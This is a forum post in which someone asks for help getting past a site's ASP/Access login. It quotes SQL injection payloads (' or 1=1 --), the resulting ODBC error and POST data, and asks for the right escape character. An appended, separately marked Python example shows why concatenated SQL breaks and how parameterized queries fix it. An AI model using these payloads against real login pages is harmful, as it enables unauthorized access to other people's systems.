Hello:
After testing a site's login page, I found that it is vulnerable to SQL injection.
The database it uses is Access.
I injected this code:
' or 1=1 --
' or '1'=1' --
and I got the following message:
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
--------------------------------------------------------------------------------
Technical Information (for support personnel)
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'TAC_ID = '' or 1=1 --' AND TAC_Attr = '[Global]Passwd''.
/asp/pass/login.asp, line 36
Browser Type:
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Page:
POST 42 bytes to /asp/pass/login.asp
POST Data:
username=%27+or+1%3D1+--&password=&login=1
--------------------------
1: I wanted to know what the escape character is in the ODBC Microsoft Access Driver? (-- does not work)
Of course, once I enter the correct syntax (that is, I keep the ' characters in the right order), we get an access denied message.
2: Do you know of any good material on SQL injection?
mer3000000000000
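For whoever maintains a page like this login.asp, an added example (not part of the original post and not the site's code) of why a single quote in the username produces the driver error quoted above, and of the parameterized form that removes it. It uses Python's sqlite3 as a stand-in for ASP with the Access ODBC driver; the table name `settings`, the column `TAC_Value` and the sample row are assumptions, and only `TAC_ID`, `TAC_Attr` and `[Global]Passwd` come from the error text.

```python
import hmac
import sqlite3

def make_db():
    # Constructed sample data. Table name and TAC_Value column are hypothetical;
    # a real system would store a password hash, not the password itself.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE settings (TAC_ID TEXT, TAC_Attr TEXT, TAC_Value TEXT)")
    db.execute("INSERT INTO settings VALUES ('alice', '[Global]Passwd', 's3cret')")
    return db

def _check(row, password):
    # Constant-time comparison of the stored value with the submitted one.
    if row is None:
        return "denied"
    same = hmac.compare_digest(row[0].encode(), password.encode())
    return "ok" if same else "denied"

def login_concat(db, username, password):
    """'Before' form: the username is spliced into the SQL text, so any quote
    in it changes how the statement is parsed."""
    sql = ("SELECT TAC_Value FROM settings WHERE TAC_ID = '" + username +
           "' AND TAC_Attr = '[Global]Passwd'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # The page in the post returned the raw driver message here, exposing
        # the query fragment. Return a generic result and log server-side.
        return "error"
    return _check(row, password)

def login_param(db, username, password):
    """Hardened form: the SQL text is fixed and the values are bound as
    parameters, so quotes and comment markers are only data."""
    sql = "SELECT TAC_Value FROM settings WHERE TAC_ID = ? AND TAC_Attr = ?"
    row = db.execute(sql, (username, "[Global]Passwd")).fetchone()
    return _check(row, password)

if __name__ == "__main__":
    db = make_db()
    # A legitimate name containing an apostrophe already breaks the first form.
    print(login_concat(db, "o'brien", "x"))
    print(login_param(db, "o'brien", "x"))
    print(login_param(db, "' or 1=1 --", ""))
    print(login_param(db, "alice", "s3cret"))
```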